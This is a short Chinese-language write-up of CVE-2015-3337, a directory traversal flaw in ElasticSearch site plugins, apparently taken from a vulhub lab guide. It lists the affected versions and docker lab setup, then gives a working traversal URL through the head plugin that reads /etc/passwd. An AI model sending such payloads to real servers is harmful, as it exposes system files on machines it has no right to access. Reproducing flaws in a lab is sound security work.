(CVE-2015-3337)ElasticSearch_目录穿越漏洞

# (CVE-2015-3337)ElasticSearch 目录穿越漏洞

===

一、漏洞简介
————

在安装了具有”site”功能的插件以后,插件目录使用`../`即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

二、漏洞影响
————

影响版本:1.4.5以下/1.5.2以下

三、复现过程
————

编译及运行测试环境

docker-compose build
docker-compose up -d

测试环境默认安装了一个插件:`elasticsearch-head`,主页在此:https://github.com/mobz/elasticsearch-head

访问`http://www.0-sec.org:9200/_plugin/head/../../../../../../../../../etc/passwd`读取任意文件(不要在浏览器访问):

![](/static/qingy/(CVE-2015-3337)ElasticSearch_目录穿越漏洞/img/rId24.png)

### head插件

head插件提供了elasticsearch的前端页面,访问
`http://www.0-sec.org:9200/_plugin/head/` 即可看到,不多说了。

参考链接
——–

> https://vulhub.org/\#/environments/elasticsearch/CVE-2015-3337/

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容